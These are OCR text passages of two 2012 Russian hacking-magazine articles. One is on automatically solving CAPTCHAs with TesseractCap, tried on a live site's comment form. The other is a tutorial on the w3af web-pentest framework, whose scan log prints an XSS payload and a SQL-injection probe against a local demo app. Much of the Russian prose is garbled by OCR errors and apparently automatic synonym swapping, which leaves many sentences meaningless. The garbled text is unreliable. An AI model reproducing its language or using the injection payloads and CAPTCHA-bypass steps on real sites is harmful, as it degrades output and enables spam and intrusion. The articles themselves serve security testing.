чающая/отключающая прибор предвари­ тельной обработки изображений, который мы рассмотрим далее. По умолчанию предварительная производство изображений отключена. Пользователи на первых порах настраи­ вают фильтры предварительной обработ-

for(each pixel in

САРТСНА)

компоненты пользу кого всех пикселей изображения.

{

Каждое числовое пашня может довольствовать

if (invertRed is true) new red=255 - current red if (invertBlue is true) new Ыuе=255 - current Ыuе if ( inve r tGree n is true) new green=255 - current green

компонентов каждого пикселя на зависимости от значения на луг выполняются следующие

действия:

0.

САРТСНА-изображениям равным образом кроме активируют загружаемые задним числом включения опции ЕпаЫе

lmage

Pгepгocessiпg, проходят предвари­

Если важность равняется

-1, уместный

цветовой деталь отнюдь не меняе т ся.

ки изображений как один человек тестируемым этот устройство . Все СА РТ СНА-изображения,

057

lот -1 вплоть до 0551 возможных значений. Для RGВ­

0.

Если достоинство безграмотный в равной степени

-1,

постоянно найденные

компоненты указанного цвета !красный, зе­

Инверсия одного иначе говоря нескольких цветов

леный не так — не то синий] меняю т ся во соответствии

почасту открывает новые внутренние резервы чтобы про­

веркитестируемого САРТСНА-изображения.

вместе с введенным на полина значением. Значение О удаляет компонент, авторитет

тельную обработку равно еще дальше передаются в ОСR-систему Tesseгact пользу кого извлечения

Этап

0. Изменение

цвета

текста.

На данном шаге дозволяется переработать цветовые

055 устанав­

ливает его максимальную напряженность

да т. д.

Этап

0. Градация

серого !Шкала яркости)

На третьем каста п е весь изображения конверти ­ руются на изображения во градациях серого . Это Chop"""' O Activ.ste

01 <· 0 t~

лишь необходимый буква п п реобразо ­ вания изображений, ко т орый н ельзя про­ пустить. В зависимости ото выбранной кнопки выполняется одно с следующих действий, связанных вместе с цветовой составляющей каждого пикселя:

Aveгage -71Red + Gгееп + Bluel/3 . 2. Humaп -7 00.21 • Red + 0.71 • Gгееп + 0.07 • Bluel . 3. Aveгage of minimum апd maximum соlог componeпts -?IMiпimum IRed + Gгееп + Blue) + Maximum IRed + Gгееп + Blue ll /2 . 4. Miпimum -7 Miпimum IRed + Gгeen + Bluel. 5. Maximum -7 Maximum IRed + Gгееп + Bluel.

0.

В зависимости через интенсивности равно рас­

пределения цветовой составляющей САРТСНА любой с сих филыров может улучшить @ Smooth Mack 0

0

Q S~M~2

Q S~~M~2

Sh.vpen Ммk 0

0

извлекаемое слепок пользу кого дальнейшей

Sharpen Ммk З

Q S~M~S

0

обработки . Этап

0.

Сглаживание да внезапность

Чтобы накрутить вытяжка текста И з мен е ни е за м ех возле изменении различны х д равным образом апазонов цветового з начения число «пи» ко сел ей на сторону белого другими словами черного

с САРТСНА-изображе н ий, на них д обавляют

Х АКЕР

03 /158/2012


П рове р ка для п ро чн ос ть

гомон на форме однопиксельных сиречь многопик­

выдается неловкость равно матрица невыгодный подле меняе т ся.

Этап

сельных точек, посторонних линий да пре­

П ри выборе фиксированной маски кнопку

Это т фуй льт р строит г рафик з а висимости з н аче­

етранетвенных искажений . При сглаживании

Save Mask

пустить в ход неграмотный требуется.

0. Вводим

Этап

фильтры

Н а этом этапе обработки изображения е г по отношению

Passes

Cutoff.

В числовом раздолье

нужно указать, как долго раз в год по обещанию нужно

ния уров н ваш покорнейший слуга маловыразительно г что касается по отношению т частоты

(cutoff) встречаемос т да

работы об т секаю щ его фуй льт ра п оказа н ни а

устранения которого попозже используются

alias

Настройка отсечения

равно предлагае т выбрат ь усекание . П ри нц равным образом п

изображения возрастает стохастический шум, пользу кого

Bucket

0.

оттенки серого

на п посев д очес д е :

пиксели могут состоять окрашены во беспредельный

обратиться с~ответствующую маску изобра­

область распространения оттенков серого. Этот фильтр ото­

жения накануне переходом в ближайший этап.

бражает операция градаций серого

Давай рассмотрим компоненты фильтра к

во

сглаживания да повышения резкости. Доступ­

пикселей, окрашенных на оттенки серого

ны неуд как масок изображения:

на диапазоне с О по

00 баке т ахти [Ьuсkеt)/диапазонах. П ро ц ен т 12,

указан на ба кете О,

if (pi xe l 's gr ays cal e value <=Cutoff ) pixel graysca l e val ue=( е OR 055) - > на зави от им об сти, об т т в отношении го наравне а ваш покорнейший слуга опция выбра н а (<=и ли=> : Set Every Pi xel with valu e <=/=> Th r eshold t o е. Rema i ning t o 055 )

Фиксированные маски. По умолчанию

барыш пикселей, окрашенных на касательно тт енки

TesseгCap имеет цифра преимущественно популяр­

бездарно г относительно на диапазоне с

ных масок изображения. Эти маски могут

выравнивать вид alias увеличивать

с следующих действий в целях каждого диа­

ние пикселей САР Т С Н А до цвета м равно п омо г ае т

некультурность [преобразование Лапласа). Из­

пазона значений, соо т ветствующих оттенкам

уничтожить п омехи от через отсе ч ения з н а ч е­

менения отображаются мгновенно но впоследствии вы­

серого:

ний уро вн пишущий эти строки серого .

бора маски со через соответствующих

0. Остави т ь без участия измене н ия [Leave As ls). 2. Заменить белым [White). 3. Заменить черным [Biack).

Этап

кнопок.

Пользовательские маски изображения.

03

по

05,-

во ба кете

т. д. Пользователь может найти одно

0: Обтесывание (choppiпg)

После применения со глаживаю щ е г о, отсекаю­

ще г о,

Юзертакже может настроить пользова­ тельские маски обработки изображений,

График показывает п что касается д роб н ое рас пр е д е л е ­

Бла г одаря сим оп ц иям позволительно контроли­

bucket-

равным образом д ругих фу-ты л ьтро во САР Т С Н А ­

изображе н ия всё е щ е могут бытовуха ь вслед ш у м ле н ы

вводя значения во числовые полина равно нажи­

ровать отличаются как небо и земля диапазоны оттенков се­

однопиксельными иначе счета п иксе л ьными

мая кнопку

рого, а опять же сокращать/удалять шум, меняя

точками, посторонними линиями да п реетран ­

оттенки серого во сторону белого либо черного.

етвенными искажениями . П рин ц равно п рабо т ы

Save Mask . Если

запас и следствие коэф­

фициентов на сих окошках поменьше нуля,

' J •' '. /

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ:

КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ


PCZONE РАСПОЗНАЕМ КАПЧИ

фильтра обтесывания зак л ючается на следую­

меняет его вес уровня серого новым,

щем: коли доля смежных пикселей,

во вкусе показано внизу на псевдокоде. Инверсия

окрашенных на нынешний нюанс серого, мен ь ше

серого проводится для того подгонки изображе­

этой утилиты, равным образом сегодня что надо было бы про­

величины на числовом поле, фильтр обтесы во а­

ния почти ц во етовые настройки ОСR-системы.

проводить диагностику какую-нибудь капчу сверху прочность.

ния п шала на аивает им з н аче н ие О [ ч ерный ! иначе

055 [белый! п об во ыбору п в рассуждении л ьзователя. П ри э т ом САР Т С Н А анализируется вроде на горизонталь­ ном, эдак да во вертикал ь ном направлении.

Ну аюшки? ж, пожалуй, да мы со тобой рассмотрели всегда опции

Предлагаю чтобы примера позаимствовать нарост говорят xakep.гu.

for(eac h pi xel i n САРТ С НА ) new grayscale value=255 - current graysc al e value

Итак, запускаем утилиту равным образом пойдем держи сайт журнала . Видим каталог свежих новостей, за­ ходим на первую попавшуюся равным образом пролистываем

накануне места, идеже дозволительно отстать кровный коммента­ Этап

0: Изменение

ширины размер .

Этап

00: Проверка

распознавания капчи

рий. Ага, коммент в такой мере просто-напросто неграмотный прикинуть [еще бы, а так бы издавна поуже всё эаспамилиl- нужно

Как у тв ерж д ает сочинитель ути л да т ы, на ходе

Цель данного этапа - вручить предвари­

п ерво н ачаль н ых равным образом сс л е д ова н ий равно разра­

тель н по части обработанное САРТС Н А-изображение

инъекцировать капчу. Н у сколько ж, проверим, позволительно

ботки TesseгCap спирт стократ отмечал,

ОСR-системе для того распознавания. Кнопка

ли сие автоматизировать . Копируем

что, когда-когда САРТСНА-изображения имеют

Solve

беретка рисунок в дальнейшем фильтра

URL

картинки равным образом вставляем его на адресную строку

толстую граничную линию равно ее окраска отлича ­

инверсии серого, отправляет на ОСR-систему

TesseгCap . Указываем, что-то нужно навалить

ется через основного фона САРТСНА, иные

пользу кого извлечения текста равным образом отображает воз­

капч, равно нажимаем Staгt . Программа покорливо

вращенный телекс во графическом интер­

загрузила

Д анный фильтр п редназ н ачен для того обрабо т ки

системы

фейсе. Если рассмотренный шрифт совпадает

познать. К сожалению, по сию пору капчи оказались

OCR

безграмотный могут рас п ознать текст.

02

02

картинок равным образом попыталась их рас­

граничных линий равным образом их изменения. Граничные

вместе с текстом в капче, значит, пишущий сии строки в точности

либо никак не распознаны, об нежели свидетельствует

силуэт вместе с шириной, которая указана во число­

задали фильтр чтобы предварительной об­

индоссамент

вом поле, окрашиваются во черноголовый либо — либо снежнобелый

работки. Теперь позволено перескочить возьми вкладку

неправильно. В общем, неудивительно, что-то около

соответственно выбору пользователя.

опций да влить опцию предварительной

что посторонние шумы равным образом искажения отнюдь не были

обработки [ЕnаЫе

удалены. Этим наша сестра безотлагательно равным образом займемся . Жмем

Этап

0: Инверсия

серого оттенка

Это т фуй л ьтр п роходит каж ды й пиксель да увлекаться

lmage Pгepгocessiпgl про

-Failed-

подо ними, либо распознаны

обработки всех последующих загруженных

правой кнопкой мыши сверху одну изо

капч.

женных картинок равно отправляем ее на систему

02

загру­

МИНЗДРАВСОЦРАЗВИ1ИЯ РОССИИ ПР~ДУ


Пр оверка получи и распишись пр что касается чн отросток

nредварительной обработки

[Send То lmage

Ргергосеssог]. Внимательно рассмотрев постоянно

ЗАКЛЮЧЕНИЕ

В конечном итоге, во вкусе мы ни бился, своим чередом

САРТСНА - изображения являются одним

различить наплыв говорят у меня круглым счетом да никак не получилось .

изо самых эффективных механизмов сообразно защите

ры, потому-то пошли возьми вкладку опций равным образом указы ­

Пришло сь делать опыты из pasteЬin.

веб -приложе ний с автоматизированного за­

ваем, ась? отождествлять нужно лишь цифры

com,

[Сhагасtег

02

капч, видим , который они содержат только лишь циф­

Это, в духе видишь, совер шенно неверно.

которые минуя проблем посчастливилось рас­

полнения форм. Однако слабые капчи смо г ут

Set; Numeгics]. Теп ерь можно п е реходить получи вкладку lmage Pгepгocessing

познать. Но когда твоя милость окажешься уси дчивее

защити ть ото случайных роботов равным образом малограмотный устоят

да терпеливее да сумеешь унаследовать кор­

на пороге целенаправленными попытками их

с целью настройки фильтров. Сразу скажу, в чем дело?

ректное распознание капч из xakep.гu, так

решить. Как да криптографические алгоритмы,

п насчёт игравшись не без; первыми тремя фильтрами

моментально заходи нате вкладку опций равно включай

САРТСНА-изображения, тщательно проте­

[ << Инверсия цвета>>, <<Изме нение цвета >>,

пре дв арительную обработку изображений

стированные да обес п ечи на ающие ваш брат сокий уро­

<< Градация безжизненно г по части » ] автор никак не увидел никакого по­

[ЕnаЫе

lmage Pгepгocessing]. Затем пере ходи

вень безопасности, являются самым лучшим

ложительного эффекта, потому оставил тама

получи

и, кликнув получай Staгt, загружай свежую

способом защиты. На основе статистики,

всё по мнению дефолту. Я выбрал маску

порцию капч, которые сейчас будут пред­

которую привел композитор программы, ваш покорный слуга выбрал

варительно приготовляться твоим филь­

пользу кого своих п роектов гeCaptcha равным образом буд у реко­

Smooth Mask

установил численность относительно ходов равным

Main

тром. П осле того, вроде утилита отработает,

мендова ть ее во всех отношениях своим друзьям- возлюбленная ока ­

залась самой стойкой изо протес т ированных.

которых меньше, нужно ввести во О, а те,

забраковать корректно/некорректно распознан­ ные капчи [кнопки Магk as Соггесt/Магk as l nCoггect] . С сего момента не возбраняется просма­

которых больше, на

тривать сво дн ую статистику в соответствии с распознава­

полуавтоматизированное постановление САРТС Н А.

нию от через

Через внеочередной

одному. Фильтр Gгayscale

buckets

аз многогрешный пропустил

равно перешел вмиг ко настройке отсечения . Вы­ б рал значимость

054

равным образом указал, что-то те пиксел и,

055.

Чтобы отрешиться

относительно т оставшихся точек, включил

chopping

равным образом из­

Show Statistics . В

общем-то ,

В любом случае безвыгодный не без; тоит забы вать , аюшки? на Сети есть нема ло сервисов, которые предлагают

API

твоя милость передаешь серви­

сие чудаковатый рапорт по отношению защищенности праздник

су рисунок , а оный от непродолжитель ­

фильтр подключать невыгодный было смысла, потому-то автор этих строк

иначе прочий САРТСНА. Если стоит только вопросительный знак по части вы­

ное пора умереть и малограмотный встать звра щает постановление . Решает ка пч у

от разу нажал держи

боре того иначе др угого решения, в таком случае из помо­

подлинный засранец [например, с Китая ] , п о­

щью TesseгCap радикально позволено проложить свое

лучая следовать сие свою копеечку. Ту т сейчас больной

собственное тестирование.

защиты кто в отсутствии : ]. ::::к:

менил ширин у формат вплоть до

00. Последний

Solve.

На капче у меня было число н относительно расписание распознала его

014945, как 011435.

Содержание во дыме сигареты: смолы - 0; 0 мг, никотина- 0,4; 0, 0 мг, С О- 0; 0 мг

0Р~ЖДА~Т: КУР~НИ~ ВР~ДИТ ВАШ~МУ ЗДОРОВЬЮ


PCZONE

Тара от Иващен ко

loxdeflaoxdef.info] ·

~-

v

ФРЕИМВОРК

[!]·

на веб-пентестера

·~

Ин форм ац равным образом я пред ст авп е н а и из кл юч равно т ел ьно для по отношению з н ак об м ления .

Редакция никак не нес е т отв е тственности

ТЕСТИРУЕМ БЕЗОПАСНОСТЬ ВЕБ-ПРИЛОЖЕНИЯ С ПОМОЩЬЮ WЗAF

вслед е е использование в прот равно нет слов з а ко что касается н ны х

целя х. nодобные

дескать йствия вл ек у т з а вместе с о й уголовно е преследование .

Прое ко т wЗaf от равным образом льно выделяется сред равным образом мног их други х инструм е нтов на ис из ледования

безопасности веб-приложени й. Это

безграмотный обычны й автосканер не без; настрого забитым функционалом , а фреймвор к, позволяющи й

равно спользовать паче сотни различных плагинов для исследования сайта, поиска уязвимасте й и их последующей эксплуатации . ЧТО ТАКОЕ WЗAF? Совреме н ные веб-приложе н равным образом аз многогрешный сейчас маловато нежели похожи н а своих п ред­ ш естве н нико на , ко т вопль ы е бы л да на шаг у е щ е п автор т ь л ет н аза д . Они стано ­ вятся всё побольше популярными, ис п ользуют неизмеримо сильнее техно­ логий, в чем дело? увеличивает сбыточный градиент атаки, обрабатывают всё больше разной информации, включительно финансовые равным образом переанальные данные . Чтобы прибавить риски, пишущий сии строки можем ввести процес из безоnас­ ной разработки п рограммна го обеспечения, важным эт апом которого является тычина т иро во ание безопас н ости. Услов н по части говоря , дозволительно выде­ лить четное число ыре на ида тестиро на ания безопасности веб - приложения :

0. Автоматизированноесканированиенауязвимос т и. 2. Ручноетестированиебезопасностиlпентестин~ . 3. Статическийанализкода. 4. Аудит кода.

-

n

Сегодня автор этих строк хочу рассказа т ь по части проекте wЗaf lwЗaf. oгg l . Это фреймворк !Web Applicatioп Attack and Audit F гamewoгkl , кой может состоять исполь зова н для для тестирования бе зо пасности во еб-приложения

первых двух видов тестирования. Автором сего открытого проекта является Андреас Рианчо с Аргентины. Сейчас чертеж разрабаты­ вается nреимущественно им равно мелкотравчатый гру nn ой контрибьюторов

со по сию пору г по части мира, на ко т орую вступление ит да ав т галдеж сих строк

,._ ~.ы. jNII'amtWI axllt

ним вдобавок принимают активное соболезнование такие известные компании,

·-·""""""'

. ..... ..,"",_ Plugin

..

N:Jt.ie

-.

:1. В работе получай д

Thll ptugln 0nr:ts СIОМ 0118 SCI\ping (XSS) 'o'lllntl'.ьllllin.

в духе

TolndXSS~twpluglnwllstl'lda . . ofi81161C:11pttmoJD8\II!Yp61."....., andsнrctlforfllllnpulln . hlltlpCIIIИ. Тhepaiiiii'IМtr "~c:onev.nsltoepkqniOIIOAIIIO.Ifi~IOhwetlfC)pliedon 81'1d81h.,..;l, requnt .. P'Qt$4!CI'in~bflolqu:twrцnOtiOICII«ЬOttlminllhoWI'I\CII'I)'

~НinQS .,I иntlarmylr1к'ion~

~

Rapid7

да Я ндекс! Фреймворк написан сверху

Python,

который, на правах твоя милость

знаешь, является << языком со батарейками>>. Батарейки wЗ af- зто его расширения, которы х набралось сейчас в большинстве случаев сотни. Это, конечно, еще не

Mozilla

Fiгefox, только уж порядочно мощное медикаменты .

A" tfl'lliiRtOOtl r.1 <,« '*"IFilt

Q

.Z II.Я.

,_,

~ l!miFill

tМckSIONd

0:3

011111'A:18f01CМC~~s l 0

насчёт

0 Oi

КАК УСТРОЕН WЗAF? Фреймворк wЗaf состоит изо двух важных частей: ядра равно плагинов.

Главное остановка wЗaf

Ядро запускает лучший nроцесс равным образом координир ует работу плагинов ,

ХАКЕР

03/158/2012


Фреймворк пользу кого пенте со т шутник

,·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- ·- - ·- ·- ·- ·- -, - · - · - · - · - · - · - · - · - · - · - ·,

: (Discivery)

ко на еб -nрил оже нию равным образом его ответах . Если что касается nять пров нашел ти аналогию

.

не без; коллективно

(вrutforce) ~ : •

0

UNI X, сие собственно эквива л ен ттекс т ово го nотокового sed, н относительно ужедля НТТР-транз акций. Заме уток вот всех от­

редактора

ветах hidd en -n oля для обы чны етекстовые? П ожалуйс т а! Еvаsiоn -nлагины исnользуются для того обхо д а nростых nравил раз­

0.

личных 005. Хо чеш ь nодальше уцелеть незамече нным nр равным образом nр о­ ведении очередного nентеста веб -nр иложения? То гда исnользуй

что-нибудь изо сего набора.

0.

Оutрut-nлагины выn ол няют простую миссию: формируют на удо бо­ читаемом виде насчёт т четы относительно результатах работы wЗaf. Вы бирай, что тебе сильнее nодходит-<<nравославныЙ >> текстовый вид т иначе говоря

И нфо рмаци в рассуждении нный nоток на wЗaf

<<э нтерn райз н ый>>

POF,-

тож nо-быстрому наnиши паче nод­

колеблющийся на твоих нужд nлагин . а этак а обме н инфо рмации в обществе ними. Плаг ины, во со во ою очередь,

0.

Аuth-nлагины берут возьми себя круглый nроцесс уnравления nоль­

находятуязвимости равным образом п озволяют пр оэкс пл уа тировать их. Ч ерез база

зо на ательской сессией: авторизируются на веб-nриложении,

плагины обмениваются информацией, для прим еру, в рассуждении найденн ых запро­

nроверяют, так чтобы конференция оставалась катись колбасой дн ой, равно выnолняют во

сах ради фаззинга. В ко аче из тве ц ентрального хранилища информации

конце сканирования приличный исчезновение изо веб-nриложения. Это

выст у паеттак называемая «б аза з наний >>.

по части ч е нь удовлетворительно обно. Ещ ё со во сем н е давн по отношению отнюдь не б ыл что касается удоб н ой потенциал

Слово «фрейм ворк >> во названии разработки у п отребляется малограмотный слу ­ чайно . WЗaf пр е д оста вля ет платформ у, на в таком случае минута во вкусе огульно функцио­

просмотреть nользовательские части веб-приложений, ведь сделал ть те, ась? возьми хо дятся следовать авторизацией. Да , позволительно было означить wЗaf

наличман про пентеста реализован на разных плагина х. Для каждого нового

исnользовать nредварит ельно nолученную равным образом з браузера куку, н в рассуждении

ск анир ова ния твоя милость можешь подбирать лишь нужные тебе аддоны,

сие н е самый инструмент обный сnособ. Сейчас на составе wЗaf общей сложности одиночный

комбинируя их. Плагин каж дого типа, котор ы х во общей сложности на­

аuth -n лагин, так дьявол nодойдёт с целью большинства случае в. Д а равным образом невыгодный

счи тываетс моя особа восемь, отвечает ради осуществление по отношению пр е деленной ради дач да .

забывай, что-нибудь наш брат имеем д ело со фреймворком, равным образом не грех наnисать

0. Плагины в целях поиска на холм можны хточек на хо правда на пр иложение !или та ко

экий nлагин nрактически интересах кто хочешь комплекция ауте нт ификации:

называемые disсоvегу-плагиныl собирают конституция , ссылки равно не выделяя частностей

SMS, токены

равным образом т.n . У тебя во руках весь мощь Python!

всё, который можетсгенерироватьзапрос ко на еб- пр иложению. Та ким об­ ра зо м формируется король запросовтестируемого приложения . Хо ­ рошим прим ерам та ко го плагина является образцовый веб-паук ,

Теnерь, эпизодически ты да я малограмотный целый ряд разобрались от архитектурой wЗaf, настало

скаются на группа е, по причине ч ему цели , обнаруженные сверху пр е дыду­

период у смотреть его на д ействии. Сnециа льн насчёт пользу кого д емо н со трации моя особа на­

щем этапе, п касательно падают получи и распишись на хо д сих а плаг ино на в следующем э тап е.

nисал nростое, же оче нь <<вебдва нольное >> nриложение социальной

Этотnроцесс nродолжаетеядатех п по отношению р, n ока никак не короче д ос тигн ут

наnравленнос т да nод названием ltte г. Да , сие сер во ис с целью ведения

лимит, данный ради режима nои ска цел ей к фаззинга.

0. Аудит-nлагины исnользуютвывод nлаг инов !то глотать т иллюминаторы входа в nриложениеl ради n оиска у пишущий эти строки з на равным образом мастей, коток орые nозволяютосу­ щест витьтакие атаки, какХSS, SQL-инъекция, IR)LFI равным образом обилие

микроблогов, равным образом , автор этих строк надо еюс ь , возлюбленный ста н е ттаким но nоnулярным, равно как его

недостаточный

040 символами сверху одно передача стар ши й светильник т. :1

Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано возьми

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска равным образом услуга nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный во виде модуля webSpideг. Оisсоvег у -плагины вслед за пу­

Gгер-nлагины nросты, однако во в свою очередь момент очен ь nолезны, наравне равным образом изо на ест­

nолноценный достуn ко функционалу nриложения nредоставляется

ная UNI Х-ут илита , во почтительность которой они бери з ваны . Смысл та кой: вследствие

только лишь заре гистрир ованным равным образом авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая под масть НТТР -зап р ос/от вет, во которой nроизводится nоиск интересующей для из информации !номера

фонд н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

равным образом т. n.l. Эти nлагины и умеют приискивать учас тки nотенциально

имеет, чертяка nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для азы дайте nросканир уем наше веб-nриложение минус авториза­

document.write document.location eval

тр и, однако сие n ока небольш ой абсурд nр из) да н терфейса:

ции- nросто натравим получай него сканер. В wЗa f поглощать двум ! во ообще, ранее

gtkUi - графический, основанный получай тулките GTK; consoleUi - хакерекий Ul пользу кого консольных старожи ловитва !конечно же, из удобным автомобиль вслед за вершением искажение нд) .

0.

П од об ны е участки заключение зачастую создают nредnосылки в целях р еа­

Будем исnользова ть nервый изо них. Для заnуска GUI-версии на­

ли вслед ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем на консо ли <<./wЗaf_gui>> да видим кое-что nо хожее держи изображен­

DOM Based XSS).

ное получай ск р иншоте

Вгu tеfо гсе- nлагины , во вкусе не запрещается научать ся, nроизводят nеребор

nр офиль, цель, nлагины равным образом тулбар. Немн ого расскажу относительно nрофилях.

значений к ме х анизмов аутентификации НТТР

0. Гл авное

расстояние единовременно д елено для сколько-нибудь секций:

Basic равным образом для того обыч­

утнапиштим конституция ради лаги держи . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы во хо верно согласно сод е ржани ю на ни х двух nараметро в, о дин изо которых им еетти n passwoгd. По сле об снаружи ния тако й

сложение одновременно начинается б р ут.

0.

Аttасk-nлагины nредназначены отнюдь не ради nоиска брешей, а пользу кого их

экс пл уата ции. Они, вроде равно др угие аддоны, используютобщую базу знаний относительно те ст ируемом nриложении, во ча со тности , они используют ин­ формацию в отношении найденныхуязвимастях равным образом пытаются их пр оэкс nл уати ­ ровать . Да-д а, прямо сии nлагины могутnомочьдобыть заповедный

••

.......

..

-

..... .. ...._.

ш е лл бери бажном сервере. ;l

0.

Маnglе-nлаг да ны nозв оляютнал ету сменять что-нибудь во следовать nро сах

ХАКЕР

03/158/2012

Структу р а на еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 01181adGE1. f l'leS811diiiiW8S:

"limt=15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты во wЗaf

Как дозволительно догадаться, эт что до именованные наборы настроек, которые

Suite,

дозволительно погружать на wЗaf. П об сути, сие in i-файлы, во которых твоя милость можешь

«nо льзовательские прокси>> позволяют на реальном времени что до т слежи­

удерживать nолюбившуюся тебе конфигурацию wЗaf, во томище числе те­

вать [и аж изменять! НТТР-трафик посредь веб-браузером равно веб­

стируемый

сервером. Конечно, одинаковый орудие питаться равным образом во комплекте wЗaf.

URL,

выбранные равно настроенные плагины, саге-настройки

равным образом многое другое. Например, про сканирования ltteг моя персона создал беспритязательный

иначе аж популярного аддона ко Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем аж две:

профессия около названием М у Pгofile, засим подключил во нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг да

диалоговый механизм lnteгcepting Ргоху пользу кого ручноготестиро­

gгер-плагинов с целью

вания.

XSS-

pykto [порт знаменитого Nikto для Pythonl, пару поиска DOM XSS равно небольшую толику плагинов чтобы поиска

равным образом SQL-инъекций. Ч тобы пофигачить сканирование, нажимаем Staгt

да ждем серия минут, доколе малограмотный появятся первые результаты. Кста­ ти, я всякий раз можем присматривать ради действиями wЗaf бери вкладке

Log,

Для наших целей будем воспользоваться spideгMan, который, в духе ты да я

сделано разобрались, представляет лицом disсоvегу-плагин. П опробуем

камо на реальном времени выводятся информационные сведения

его на деле. П одключаем плагин во главном окне равным образом запускаем сканиро­

через ядра равным образом п лагинов. Ход процесса отображается помощью прогреес - стрип-бар

вание. В веб-браузере на качестве пр окси прописываем

равным образом некоторые идентификаторы.

[я использую интересах сего адд симпатия F охуРгоху в целях F iгe f ox, сообразно зво ля ющий

П ример н касательно чрез

минут фотосканирование завершается. Посмотрим,

00

027.0.0.1:44444

совсем нечего делать править проксями да перекидываться меж ду ними! . SpideгMan

аюшки? посчастливилось отрыть wЗaf. П омимо ошибок конфигурации Апача да кучи

бросьте запущен прежде webSpideг, приблизительно в чем дело? завершающий сможет воспользоваться

подозрений получи и распишись

его результаты . Переключившись бери spideгMan во нашем браузере, н е­

DOM XSS, сканнер обнаружил мало-мальски XSSI Одна из них, на /i ndex.php, представляет с целью нас частный интерес, осталь­ ные наш брат доколь отложим. Плагин Pykto, на свою очередь, обнаружил доступную страни цу статуса Apache да phpinfo-cкpиnт /test.php. Другие плагины установили номинация да версию использ уемого веб-сервера

равно веб-фреймворка. В нашем случае сие

Linux

Apache/2.2.16 получи и распишись DeЬian GNU/

равно язычишко программировани РНР. Др угая полезная фишка, которая

позволяет нам самое лучшее уяснить структуру веб-приложения,- сие вклад­

ка

URLs со древовидной

картой веб-приложения да ее графическим

представлением. Здесь а не возбраняется замечать весь НТТР-транзакции, сгенер ированные во рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

0.0

Сейчас уж ни одной живой души малограмотный удивишь играми, г рафическим редактором или видеозвонками помощью веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, во которых логика выполнения запро граммирована бери стороне клиента из активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

да др угих названий равным образом аббревиатур.

:1 Такой пропитанный ансамбль технологий всё крепче затрудняет автоматизированное опробывание безопасности веб-приложений. Прошли былые времена. Это хроника поуже отнюдь не касательно тестировании

обыкновенно г относительно веб-сайта вместе с множеством страниц вида /aгticle.php?id=68, на ко т орых, во вместе с вою по части ч е р е дь , глотать воз ссылок , форм равным образом тому п одобного <<мяса>> для того веб-паука. На жа во , в духе обычно, <Ctгi -U >,

так чтобы п обшарить НТМL-к по отношению д , твоя милость увидишь окрошка с огромного куска JavaScгipt да немножко тра д иционно г по части

HTML. П одобный

беда сколько полазаем согласно тестируемому веб-приложению. В L оg-табе видим:

[Mon 00 Мау 0011 02:08:22 АМ MST] spiderMan proxy i s running on 027.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 00 Мау 0011 02 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 00 Мау 0011 02:15 : 09 АМ М5Т] Trapped fuzzaЫe requests: [Mon 00 Мау 0011 02:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 00 Мау 0011 02:15:32 АМ MST] http://localhost/user-info. php 0 Method: GET [Mon 00 Мау 0011 02 : 02:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 0911. [Mon 00 Мау 0011 02 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 0042.

«сайт» относительно ч ен ь

сплошь и рядом никак не в области зубам веб -п ауку, построенному до классической модели.

Как будто изо лога, в надежде остановить работу spideгMan, необхо­

Это не выделяя частностей ужас интересное курс для того развития средств

димо перепрыгнуть держи индивидуальный адрес, по прошествии зачем webSpideг да отдельные люди

тестирования без батман сности веб-приложений. Ведь непонятно, наравне

плагины примутся следовать дело. Так , аудит-п лагины обнаружили

на этакий ситуации автоматизированно обвести поголовно сайт - встраи­

равно ХSS-инъекциюl П ервая дыра, оказавшаяся равно как единожды на АJАХ-запросе,

вать полноценные

была упущена кайфовый срок первого сканирования.

JS

равно рендеринг-движки? Использовать подход,

Добавлю одну крошку оборона эксплуатацию найденных ба го на . WЗaf умеет

сходный Selenium/Web Dг iveг? Дл ваш покорный слуга тестирования п од обных приложений отнюдь не быть без специализирован ны х прокси, т аких вроде

050

SQL-

OWASP WebScaгab

равным образом В uгр

сосать кровь отдельный планы получай будущее уязвимастей и, для примеру, может предоставить тебе заветн ы й шел л держи целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 0012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит нате вкладке

Exploit

получай уязвимость. Д ля эксплуа­

тации SQL-инъекций используется безусловно информированный тебе

.

---........

